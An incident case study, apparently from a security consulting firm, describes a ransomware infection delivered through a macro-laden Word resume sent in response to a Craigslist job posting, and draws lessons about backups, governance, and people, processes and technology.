The Situation
An organization that recently hired us was the victim of a ransomware attack earlier this year.
A senior member of the organization called the help desk to report that all of the files on his computer had been encrypted, and it would cost around $1,000 USD to get his files back.
The organization had strong technical controls in place, including:
- Robust anti-virus
- Anti-spam
- Anti-phishing
- Intrusion prevention technology
Despite these measures, the attack occurred. The organization’s technical staff reached out for assistance. A brief investigation revealed an unexpected weak link.
The Attack Path
The department involved in the attack was in the midst of recruiting for an open position. In an attempt to attract a larger pool of applications, the department posted the job description to Craigslist rather than using the organization’s formal recruitment portal. Applicants were instructed to reply to a mailing list, so resumes would be shared with everyone on the search committee.
Shortly after the posting, applications began to arrive. Since members of the search committee were expecting emails with attached resumes, it did not seem unusual when an email arrived with a password-protected ZIP file and the password included in the email body.
Once unzipped, the ZIP file revealed a Microsoft Word document containing a macro—a small computer program embedded within the document.
The obfuscated text inside the macro was a BASE64 encoded string. Decoding it revealed the macro’s true intention.
After a user opened the Word document and enabled macros, the script launched. PowerShell on the local Windows computer executed the embedded script, retrieving a malware executable from a remote host and running it—leading to infection.
The Outcome
In this case, the organization had robust offline backups, ensuring the availability of critical data. No ransom had to be paid; the system was re-imaged and the user’s data restored from that morning’s backup.
Lessons Learned
- This failure chain highlights how technical controls alone are not enough to stop every attack. The encrypted ZIP file payload circumvented email scanners and perimeter systems designed to block macro-laden documents.
- At the time, anti-virus, intrusion prevention, and IP blacklisting systems did not yet have malware signatures for the malicious executable or its host site.
This incident underscores the need to address all three components of the cybersecurity framework:
- People
- Processes
- Technology
Even with advanced technical controls, staff can unwittingly put the organization at risk. Without formal governance—policies, procedures, and clear accountability—workarounds become easy. In this case, a department bypassed established hiring protocols with good intentions but poor risk awareness, leaving the organization exposed.
The key: focus your cybersecurity program on people, processes, and technology. Technology may be the easiest component to implement, but governance and continuous commitment to sound processes are critical. Do not underestimate their importance.
